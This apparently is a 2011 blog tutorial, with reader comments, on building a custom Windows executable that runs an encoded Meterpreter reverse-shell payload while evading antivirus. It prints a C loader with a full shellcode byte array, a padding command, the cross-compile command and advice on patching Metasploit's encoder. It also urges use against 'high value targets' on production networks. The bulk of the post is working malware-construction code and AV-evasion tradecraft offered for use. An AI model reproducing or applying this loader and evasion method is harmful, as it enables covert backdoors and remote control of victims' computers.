Creating Custom Meterpreter EXE Templates to Bypass Windows AV

Posted: December 12, 2011 in Guides
Tags: , , ,

In a previous article I discussed using SET and shellcodeexec to create basic backdoored executable files with the meterpreter reverse shell to bypass Anti-Virus on Windows. I have received several comments and emails regarding this method not working for individuals despite it being undetectable by AV. I will now show you another method of creating a custom EXE stub to bypass AV.

It’s important to note that once you run this in Virus total it’s going to get detected, so you need to randomize your EXE stub template as much as possible. Also use this on high value targets only as each payload will have maybe a 24-48 hour lifespan on a production network before AV is picking it up.

Please Note : This is not my creation, this concept has been discussed and demonstrated about a million times by people far more intelligent than myself. So if you feel like I’m stealing your idea, I’m sorry it was a good idea 😛

Creating The Executable Skeleton

We’ll create a basic framework for our executable here this will be a simple C skeleton it will look like this.


#include
//make sure you modify this skeleton padding payload
etc every time you generate a new stub.
//this will be randomly generated to obfuscate our code
unsigned char padding[]=

;
//meterpreter payload goes here
unsigned char payload[]=

;
//here we'll push our payload to executable memory
int main(void) { ((void (*)())payload)();}

We will call this meterpreter.c for giggles.

Generating our Payload

First thing we'll do is generate our payload and encode it. Remember encoding does little in terms of AV, it gives us some benefit, however it will do more for us in terms of bypassing IDS.

 

 

 

 

After this place our payload in our meterpreter.c file and it should look like so...


#include
//make sure you modify this skeleton padding payload etc every time you generate a new stub.
//this will be randomly generated to obfuscate our code
unsigned char padding[]=

;
//meterpreter payload goes here
unsigned char payload[]=
"\xb9\x8a\x02\x00\x00\xe8\xff\xff\xff\xff\xc1\x5e\x30\x4c"
"\x0e\x07\xe2\xfa\xb8\x7a\x01\x04\x05\xee\xf8\xf7\xf6\xf5"
"\xca\x52\x3d\x42\x01\x17\xf3\xe8\xab\x70\x14\x12\x12\xf6"
"\xe1\xed\xed\xe9\xd7\x4c\x22\x62\x20\x35\xd0\xcc\x8e\x64"
"\x33\x3a\x3b\xdc\xca\xc1\xc0\xc7\xf8\x7c\x13\x50\x13\x01"
"\xe5\xfa\xb9\x4a\x0a\x00\x00\xe0\xf7\xff\xff\x87\xb9\x3e"
"\x50\x14\x56\x47\xa2\xb2\xf0\x72\x41\x4c\x4d\xae\xb8\xaf"
"\xae\xd5\xea\x6a\x05\x42\x01\x1f\xfb\xe8\xab\x00\x1c\x12"
"\x12\xce\xd9\xcd\xcd\xb1\x8f\x0c\x62\x2a\x68\x75\x90\x84"
"\xc6\x7c\x73\x62\x63\xbc\xaa\xb9\xb8\xc7\xf8\x74\x1b\x50"
"\x13\x09\xed\xfa\xb9\x0a\xf1\xe0\xe0\x38\x2f\x3f\x3f\x4f"
"\x71\xfe\x90\xdc\x9e\x87\x62\x6a\x28\x8a\x62\x74\x75\xae"
"\xb8\xa7\xa6\xd5\xea\x62\x0d\x42\x01\x27\xc3\xc8\xce\x7d"
"\xb4\x4e\x72\x4c\x05\xfe\xac\xd0\xb7\x8c\x3f\xbf\x7d\x17"
"\x52\xf3\x71\xb1\x9a\x81\x91\xad\xad\xc8\x61\x12\x59\xc4"
"\x66\xb8\x12\x7a\xa9\x6f\x35\xc3\xa0\x4f\xa0\x2b\xe2\x64"
"\x4c\x3b\x96\x95\x8d\x6c\xab\x45\x19\x5b\x25\x86\x87\x88"
"\x44\x5e\xa2\x88\xf3\xde\x6d\x22\x71\x41\x91\xac\xae\xf7"
"\xde\x82\xaa\xc0\x79\xaa\xa3\x71\xb6\x1b\xbb\x2e\xd1\xea"
"\x4e\x74\x26\xe5\xd9\xf7\x42\x4d\x82\x82\xe3\x81\xe2\xfc"
"\xe3\x1a\xa3\xd8\x0a\x62\xa1\x1f\x74\x94\x05\x3e\xa3\x5b"
"\x90\xd5\xcf\xc6\x71\xd3\xf0\x9f\x60\x63\x87\x77\x65\x5c"
"\x68\x51\x48\xef\xee\x3d\xb4\xb0\x2c\x95\x29\x60\xad\xff"
"\x22\xb9\x61\x7d\x8d\x5d\xaf\x7b\x54\x03\x16\xce\xc5\x6a"
"\x28\x9b\xfe\xa2\xb2\xfd\x31\x88\x7e\xd3\x68\xf0\xd4\x97"
"\x8d\x45\xf9\x20\x62\x14\xbf\x90\x17\xa1\x4d\x85\x5f\x0e"
"\x49\x04\x51\xc6\x10\x9e\x4f\x22\xd9\x0f\xc3\xc0\xa3\xd3"
"\xa4\x5a\x51\xe3\x97\xe6\x1e\xcb\x4a\x5d\x26\xdc\xcf\xc3"
"\x28\x09\x8c\xb5\x26\x0f\xb7\x62\x18\xe6\x24\x56\x1a\xfd"
"\x91\x77\x22\x90\xe6\xaa\x4b\x0e\x55\x8c\xc9\x17\x2f\x25"
"\x49\x31\x0a\x2d\x0b\x82\x6e\x99\x8f\xe4\xd2\x20\x28\xce"
"\xd8\x68\x35\x85\xb4\x95\xfb\xf7\x8d\x57\xea\x09\x0b\xbb"
"\xa6\x3b\x03\xb5\xf4\x49\x8b\xf4\x5e\x9e\x2e\x11\x83\xaa"
"\x22\x89\xc4\xdb\xfc\xa6\x65\xd4\x35\x88\x35\x84\x6d\xb1"
"\xe2\x7e\x88\xd2\xc6\xc5\xef\x67\x50\x35\x81\x11\x29\xff"
"\x27\x85\xc6\x7e\xc7\xc7\x2c\x5c\x14\xeb\x7b\xda\xac\x54"
"\x04\xdc\x4e\xf5\xfd\x6b\x7d\xcb\x10\x81\xde\x38\xdb\x54"
"\x4a\xf0\x0b\x5e\xbf\x9c\x8c\x6b\x91\xfb\xa8\x42\x22\x96"
"\xaa\xf5\x33\xce\xa6\x68\x04\xbe\x01\xba\xd2\x94\x24\xa5"
"\x7f\x2b\x2c\x4f\x1c\xcd\x33\x88\x83\x07\xd8\x9c\x7e\xe8"
"\x1a\x40\x79\x86\xc5\x19\x93\x0f\x4f\x86\x31\x2c\xcd\xf4"
"\x7c\xad\x28\xcb\x1c\xb5\x46\x33\x8c\xca\xe0\x85\x07\x1b"
"\x57\x11\xe2\x2b\x48\x2f\x13\x2b\xa7\x72\xb4\x02\x26\x69"
"\xbf\x92\x83\x1d\x76\xe8\x11\xcb\xc2\x76\x48\x1f\x22\xfb"
"\xbd\x8b\xc5\x0a\x77\x0a\xd9\x23\xcd\x8a\x38\x5e\x9d\x06"
"\x95\x57\x52\x29\xa5\x69\x30\x0e\x42\x88\x07\x85\x3e\xe1"
"\xf2\xf7\xed\xcc\xa2\xea\x31\x6e\x09\xdf\x6f\x0c\x5b\xc4"
"\x30\xb0\xd6\xdd\xc9\x91\x94\x4d\xbe\xf1\xf4"

;
//here we'll push our payload to executable memory
int main(void) { ((void (*)())payload)();}

Insert Random Padding

Now that we've gotten our payload inserted, let's place our random padding in. You can do this through any method. I like to do the following

cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c512 > /root/random

Change the regex on tr to whatever you need and change the count on head to as many characters as you want to use to pad.


#include
//make sure you modify this skeleton padding payload etc every time you generate a new stub.
//this will be randomly generated to obfuscate our code
unsigned char padding[]=
"cb1BB4YuXguEasx-EPPgGW9XCbgNzUub8pMFMo8IJJrgdHvKE_ywAaXhIT9ZCQ7nkwEsfyP0qRIADUORefB1y9uV0WfxJH0FWkP9y2QD3hZfYDBzcLP-sbHrdzeb9nOlhht5mj5uYsLfv2-wsXIyJ6uXWc-mQyVxyU2TULTF10I4-c545F1EVU1D_paZXshUOYAi6kpDSLIkrfj_xZW-oeqWlcoEQuBE2ZkMnTm7zHoPrpy0qt9Ikgq-p3eGS1sWz4O7D17ujwjB-i9MVk2R6J13vaa0KQ0AN_PxPT6mMbChi82FjgbNuVfHUtfH6n1Om7oHdrDCaBxxZnSYl4VutSY16K0gfpioZtLC98uj3JqQCbA7BUd7L2bEWlmJV-O1erv6bUx_YtxB6RJNdN5eTdsd3Ansd0xx_sCGZMXOtFG4VhWeOODQ8zWY5vgmobrBeaCO_HAUyvpzy81VDaYX5sHoYo8dagKhGPp4GjfaLpPRliynosv0vAHsdp3icE2X"
;
//meterpreter payload goes here
unsigned char payload[]=
"\xb9\x8a\x02\x00\x00\xe8\xff\xff\xff\xff\xc1\x5e\x30\x4c"
"\x0e\x07\xe2\xfa\xb8\x7a\x01\x04\x05\xee\xf8\xf7\xf6\xf5"
"\xca\x52\x3d\x42\x01\x17\xf3\xe8\xab\x70\x14\x12\x12\xf6"
"\xe1\xed\xed\xe9\xd7\x4c\x22\x62\x20\x35\xd0\xcc\x8e\x64"
"\x33\x3a\x3b\xdc\xca\xc1\xc0\xc7\xf8\x7c\x13\x50\x13\x01"
"\xe5\xfa\xb9\x4a\x0a\x00\x00\xe0\xf7\xff\xff\x87\xb9\x3e"
"\x50\x14\x56\x47\xa2\xb2\xf0\x72\x41\x4c\x4d\xae\xb8\xaf"
"\xae\xd5\xea\x6a\x05\x42\x01\x1f\xfb\xe8\xab\x00\x1c\x12"
"\x12\xce\xd9\xcd\xcd\xb1\x8f\x0c\x62\x2a\x68\x75\x90\x84"
"\xc6\x7c\x73\x62\x63\xbc\xaa\xb9\xb8\xc7\xf8\x74\x1b\x50"
"\x13\x09\xed\xfa\xb9\x0a\xf1\xe0\xe0\x38\x2f\x3f\x3f\x4f"
"\x71\xfe\x90\xdc\x9e\x87\x62\x6a\x28\x8a\x62\x74\x75\xae"
"\xb8\xa7\xa6\xd5\xea\x62\x0d\x42\x01\x27\xc3\xc8\xce\x7d"
"\xb4\x4e\x72\x4c\x05\xfe\xac\xd0\xb7\x8c\x3f\xbf\x7d\x17"
"\x52\xf3\x71\xb1\x9a\x81\x91\xad\xad\xc8\x61\x12\x59\xc4"
"\x66\xb8\x12\x7a\xa9\x6f\x35\xc3\xa0\x4f\xa0\x2b\xe2\x64"
"\x4c\x3b\x96\x95\x8d\x6c\xab\x45\x19\x5b\x25\x86\x87\x88"
"\x44\x5e\xa2\x88\xf3\xde\x6d\x22\x71\x41\x91\xac\xae\xf7"
"\xde\x82\xaa\xc0\x79\xaa\xa3\x71\xb6\x1b\xbb\x2e\xd1\xea"
"\x4e\x74\x26\xe5\xd9\xf7\x42\x4d\x82\x82\xe3\x81\xe2\xfc"
"\xe3\x1a\xa3\xd8\x0a\x62\xa1\x1f\x74\x94\x05\x3e\xa3\x5b"
"\x90\xd5\xcf\xc6\x71\xd3\xf0\x9f\x60\x63\x87\x77\x65\x5c"
"\x68\x51\x48\xef\xee\x3d\xb4\xb0\x2c\x95\x29\x60\xad\xff"
"\x22\xb9\x61\x7d\x8d\x5d\xaf\x7b\x54\x03\x16\xce\xc5\x6a"
"\x28\x9b\xfe\xa2\xb2\xfd\x31\x88\x7e\xd3\x68\xf0\xd4\x97"
"\x8d\x45\xf9\x20\x62\x14\xbf\x90\x17\xa1\x4d\x85\x5f\x0e"
"\x49\x04\x51\xc6\x10\x9e\x4f\x22\xd9\x0f\xc3\xc0\xa3\xd3"
"\xa4\x5a\x51\xe3\x97\xe6\x1e\xcb\x4a\x5d\x26\xdc\xcf\xc3"
"\x28\x09\x8c\xb5\x26\x0f\xb7\x62\x18\xe6\x24\x56\x1a\xfd"
"\x91\x77\x22\x90\xe6\xaa\x4b\x0e\x55\x8c\xc9\x17\x2f\x25"
"\x49\x31\x0a\x2d\x0b\x82\x6e\x99\x8f\xe4\xd2\x20\x28\xce"
"\xd8\x68\x35\x85\xb4\x95\xfb\xf7\x8d\x57\xea\x09\x0b\xbb"
"\xa6\x3b\x03\xb5\xf4\x49\x8b\xf4\x5e\x9e\x2e\x11\x83\xaa"
"\x22\x89\xc4\xdb\xfc\xa6\x65\xd4\x35\x88\x35\x84\x6d\xb1"
"\xe2\x7e\x88\xd2\xc6\xc5\xef\x67\x50\x35\x81\x11\x29\xff"
"\x27\x85\xc6\x7e\xc7\xc7\x2c\x5c\x14\xeb\x7b\xda\xac\x54"
"\x04\xdc\x4e\xf5\xfd\x6b\x7d\xcb\x10\x81\xde\x38\xdb\x54"
"\x4a\xf0\x0b\x5e\xbf\x9c\x8c\x6b\x91\xfb\xa8\x42\x22\x96"
"\xaa\xf5\x33\xce\xa6\x68\x04\xbe\x01\xba\xd2\x94\x24\xa5"
"\x7f\x2b\x2c\x4f\x1c\xcd\x33\x88\x83\x07\xd8\x9c\x7e\xe8"
"\x1a\x40\x79\x86\xc5\x19\x93\x0f\x4f\x86\x31\x2c\xcd\xf4"
"\x7c\xad\x28\xcb\x1c\xb5\x46\x33\x8c\xca\xe0\x85\x07\x1b"
"\x57\x11\xe2\x2b\x48\x2f\x13\x2b\xa7\x72\xb4\x02\x26\x69"
"\xbf\x92\x83\x1d\x76\xe8\x11\xcb\xc2\x76\x48\x1f\x22\xfb"
"\xbd\x8b\xc5\x0a\x77\x0a\xd9\x23\xcd\x8a\x38\x5e\x9d\x06"
"\x95\x57\x52\x29\xa5\x69\x30\x0e\x42\x88\x07\x85\x3e\xe1"
"\xf2\xf7\xed\xcc\xa2\xea\x31\x6e\x09\xdf\x6f\x0c\x5b\xc4"
"\x30\xb0\xd6\xdd\xc9\x91\x94\x4d\xbe\xf1\xf4"

;
//here we'll push our payload to executable memory
int main(void) { ((void (*)())payload)();}

Compile it

Now we simply compile it for Windows

/usr/bin/i686-mingw32msvc-gcc -Wall meterpreter.c -o meterpreter.exe

You'll probably get some warnings.

Now verify your shell

 

 

 

 

And check it on virus total. Report here

You should come up with less than 20% detection rate, with none of the major AV picking it up. If you're coming up higher than that you can add to your executable stub, and or try payloading an actual EXE template (don't do notepad.exe everyone does notepad). Also changing your payload for custom shellcode will give you a 0% detection rate most of the time.

If you're still getting picked up by AV you can try some hacks in

/opt/framework/msf3/lib/msf/core/exploit/exe.rb

I would suggest checking out this bit of code.

                # Copy the code to a new RWX segment to allow for self-modifying encoders
                payload = win32_rwx_exec(code)

Since most AV will trigger on the RWX push in the encoder. Modifying this and creating a custom encoder should allow you to bypass all current AV signatures. Note, that's a theory I haven't had to test it.

So... Yeah I'm not writing about Windows for a while anymore hope you guys enjoyed it 😉

Advertisements
Comments
  1. Dan says:

    “So… Yeah I’m not writing about Windows for a while anymore”

    The dark side is calling to you Adam, you must return to the Microsoft Empire! LOL! 🙂

  2. Rmmoul says:

    This worked great, except for two things. I had to remove the #include directive to get the code to compile since I wasn’t including any files and other thing was minor, in that when you create the payload, the output file has plus signs at the end of each line that need to be removed.

    Also, in backtrack I had to compile using wine, something like:

    wine ~/.wine/drive_c/MinGW/bin/gcc.exe /path/to/the/code.c -o /path/to/save/the/code.exe

    Thanks for the write up!

    • dangertux says:

      Hey yeah the #include got slaughtered, for some reason my wordpress theme escapes the characters and everything in between it. I guess it think it’s HTML. (regardless of code tags).

      It should be #include ltstdio.hgt

      I should probably also have mentioned the +’s at the end of the code but that is an easy command

      cat outputfile > sed -e s/+/ / > newoutputfile

      Also you don’t need to compile it in WINE if you don’t want you do however need the ming compiler to compile a windows binary under linux. Hope this helps.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s